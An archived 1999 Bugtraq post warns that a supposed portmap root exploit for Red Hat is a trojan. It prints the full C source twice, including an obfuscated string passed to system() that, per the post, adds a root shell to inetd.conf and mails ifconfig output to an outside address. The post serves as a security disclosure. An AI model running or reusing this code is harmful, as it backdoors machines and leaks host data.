Bugtraq mailing list archives
portmap.c Trojan
From: goatkiller () HOTMAIL COM (goatkiller)
Date: Fri, 20 Aug 1999 12:28:31 -0500
Trojan being spread to clueless kiddies, claims to exploit portmap on
Redhat boxes, really adds a rootshell to your inetd.conf file and sends
other info like your ip address by executing ifconfig, it sends this mail
to goat187 () hotmail com
Code below and also attached.
------------------------------Snip---------------------------------------
/*
Do not run unless you know what you are doing , and DONT RUN IT
AS ROOT. It Puts a ROOTSHELL in your inetd.conf and mails them
your IP address.
PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE (DOnT RUN its a
TROJAN)
portmap remote root linux exploit (TROJAN) (no stack patch)
by horizon - jmcdonald () unf edu
This was tested against redhat box with 2.2.9 kernel.
(shouldn't need offset)
BIG thanks to stran9er who wrote this shellcode!!
greets to: #!ADM and users @ el8.org ;)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define NOP 0x90
#define RET 0xbfffec90
#define PORT 5760
#define pmap_proc_p system
char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";
int max(int x, int y)
{
if(x > y)
return(x);
return(y);
}
void rshell(char *host)
{
int sockfd, maxfd, n;
struct sockaddr_in cli;
char sendln[1024], recvln[1024];
struct hostent *hp;
fd_set rset;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
if((hp = gethostbyname(host)) == NULL){
perror("gethostbyname");
exit(-1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(PORT);
cli.sin_addr.s_addr = inet_addr(host);
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(-1);
}
printf("root shell found!\n");
strcpy(sendln, "uname -a; pwd; id;\n");
write(sockfd, sendln, strlen(sendln));
FD_ZERO(&rset);
for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset)){
bzero(sendln, sizeof(sendln));
fgets(sendln, sizeof(sendln)-2, stdin);
write(sockfd, sendln, strlen(sendln));
}
if(FD_ISSET(sockfd, &rset)){
bzero(recvln, sizeof(recvln));
if((n = read(sockfd, recvln, sizeof(recvln))) ==
0){
printf("Connection closed.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(recvln, stdout);
}
}
}
void main(int argc, char **argv)
{
CLIENT *cli;
int i = 0, offset = 53;
char *portmap;
char *buf;
if(argc < 2){
printf("usage: %s <ip> [offset]\n", argv[0]);
exit(-1);
}
if((portmap = (char *) malloc(154)) == NULL) {
perror("malloc");
}
while(*shellcode) {
portmap[i] = *shellcode - offset;
shellcode++; i++;
}
pmap_proc_p(portmap);
printf("sending shellcode... connecting to remote host\n");
rshell(argv[1]);
strcpy(buf, portmap);
exit(-1);
}
---------------------------------------SNIP------------Snip----
/*
PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE
portmap remote root linux exploit (no stack patch)
by horizon - jmcdonald () unf edu
This was tested against redhat box with 2.2.9 kernel.
(shouldn't need offset)
BIG thanks to stran9er who wrote this shellcode!!
greets to: #!ADM and users @ el8.org ;)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define NOP 0x90
#define RET 0xbfffec90
#define PORT 5760
#define pmap_proc_p system
char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";
int max(int x, int y)
{
if(x > y)
return(x);
return(y);
}
void rshell(char *host)
{
int sockfd, maxfd, n;
struct sockaddr_in cli;
char sendln[1024], recvln[1024];
struct hostent *hp;
fd_set rset;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
if((hp = gethostbyname(host)) == NULL){
perror("gethostbyname");
exit(-1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(PORT);
cli.sin_addr.s_addr = inet_addr(host);
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(-1);
}
printf("root shell found!\n");
strcpy(sendln, "uname -a; pwd; id;\n");
write(sockfd, sendln, strlen(sendln));
FD_ZERO(&rset);
for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset)){
bzero(sendln, sizeof(sendln));
fgets(sendln, sizeof(sendln)-2, stdin);
write(sockfd, sendln, strlen(sendln));
}
if(FD_ISSET(sockfd, &rset)){
bzero(recvln, sizeof(recvln));
if((n = read(sockfd, recvln, sizeof(recvln))) == 0){
printf("Connection closed.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(recvln, stdout);
}
}
}
void main(int argc, char **argv)
{
CLIENT *cli;
int i = 0, offset = 53;
char *portmap;
char *buf;
if(argc < 2){
printf("usage: %s <ip> [offset]\n", argv[0]);
exit(-1);
}
if((portmap = (char *) malloc(154)) == NULL) {
perror("malloc");
}
while(*shellcode) {
portmap[i] = *shellcode - offset;
shellcode++; i++;
}
pmap_proc_p(portmap);
printf("sending shellcode... connecting to remote host\n");
rshell(argv[1]);
strcpy(buf, portmap);
exit(-1);
}
Current thread:
- portmap.c Trojan goatkiller (Aug 20)
- Re: portmap.c Trojan Wakko Ellington Warner-Warner III (Aug 21)